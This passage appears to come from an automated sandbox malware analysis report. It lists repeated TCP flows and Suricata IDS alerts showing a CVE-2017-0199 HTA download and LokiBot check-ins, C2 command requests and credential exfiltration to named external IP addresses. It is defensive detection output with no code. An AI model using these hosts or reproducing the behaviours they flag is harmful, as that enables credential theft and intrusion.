                Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
                Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
                Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
                Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
                Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
                Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
                Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
                Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
                Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
                Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
                Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
                Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
                Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
                Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
                Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
                Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
                Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
                Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
                Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
                Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
                Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
                Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
                Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
                Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
                Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
                Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
                Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
                Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
                Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
                Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
                Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
                Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
                Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
                Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
                Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
                Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
                Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
                Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
                Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
                Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
                Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
                Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
                Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
                Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
                Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
                Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
                Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
                Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
                Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
                Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
                Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
                Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
                Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
                Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
                Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80

                Networking

                barindex
                Source: Network trafficSuricata IDS: 2858795 - Severity 1 - ETPRO MALWARE ReverseLoader Payload Request (GET) M2 : 192.168.2.22:49170 -> 192.3.176.141:80
                Source: Network trafficSuricata IDS: 2024197 - Severity 1 - ET EXPLOIT MSXMLHTTP Download of HTA (Observed in CVE-2017-0199) : 192.3.176.141:80 -> 192.168.2.22:49166
                Source: Network trafficSuricata IDS: 2858795 - Severity 1 - ETPRO MALWARE ReverseLoader Payload Request (GET) M2 : 192.168.2.22:49172 -> 192.3.176.141:80
                Source: Network trafficSuricata IDS: 2024197 - Severity 1 - ET EXPLOIT MSXMLHTTP Download of HTA (Observed in CVE-2017-0199) : 192.3.176.141:80 -> 192.168.2.22:49164
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49194 -> 94.156.177.220:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49194 -> 94.156.177.220:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49194 -> 94.156.177.220:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49187 -> 94.156.177.220:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49187 -> 94.156.177.220:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49187 -> 94.156.177.220:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49193 -> 94.156.177.220:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49193 -> 94.156.177.220:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49193 -> 94.156.177.220:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49202 -> 94.156.177.220:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49202 -> 94.156.177.220:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49202 -> 94.156.177.220:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49196 -> 94.156.177.220:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49179 -> 94.156.177.220:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49187 -> 94.156.177.220:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49179 -> 94.156.177.220:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49187 -> 94.156.177.220:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49196 -> 94.156.177.220:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49178 -> 94.156.177.220:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49178 -> 94.156.177.220:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49179 -> 94.156.177.220:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49178 -> 94.156.177.220:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49196 -> 94.156.177.220:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49183 -> 94.156.177.220:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49179 -> 94.156.177.220:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49189 -> 94.156.177.220:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.22:49187
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49179 -> 94.156.177.220:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49192 -> 94.156.177.220:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49189 -> 94.156.177.220:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49195 -> 94.156.177.220:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49195 -> 94.156.177.220:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49183 -> 94.156.177.220:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49202 -> 94.156.177.220:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49176 -> 94.156.177.220:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49192 -> 94.156.177.220:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49183 -> 94.156.177.220:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49192 -> 94.156.177.220:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49195 -> 94.156.177.220:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49176 -> 94.156.177.220:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.22:49179
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49189 -> 94.156.177.220:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49176 -> 94.156.177.220:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49196 -> 94.156.177.220:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49184 -> 94.156.177.220:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49202 -> 94.156.177.220:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49196 -> 94.156.177.220:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49194 -> 94.156.177.220:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49193 -> 94.156.177.220:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49186 -> 94.156.177.220:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49195 -> 94.156.177.220:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49178 -> 94.156.177.220:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49195 -> 94.156.177.220:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49184 -> 94.156.177.220:80
                Source: Network trafficSuricata IDS: 2024312 - Severity 1 - ET MALWARE LokiBot Application/Credential Data Exfiltration Detected M1 : 192.168.2.22:49176 -> 94.156.177.220:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49194 -> 94.156.177.220:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49188 -> 94.156.177.220:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49184 -> 94.156.177.220:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49200 -> 94.156.177.220:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49200 -> 94.156.177.220:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49188 -> 94.156.177.220:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49200 -> 94.156.177.220:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49209 -> 94.156.177.220:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49188 -> 94.156.177.220:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49186 -> 94.156.177.220:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49209 -> 94.156.177.220:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49183 -> 94.156.177.220:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49209 -> 94.156.177.220:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49192 -> 94.156.177.220:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49182 -> 94.156.177.220:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49186 -> 94.156.177.220:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49200 -> 94.156.177.220:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49178 -> 94.156.177.220:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49182 -> 94.156.177.220:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49199 -> 94.156.177.220:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.22:49194
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.22:49196
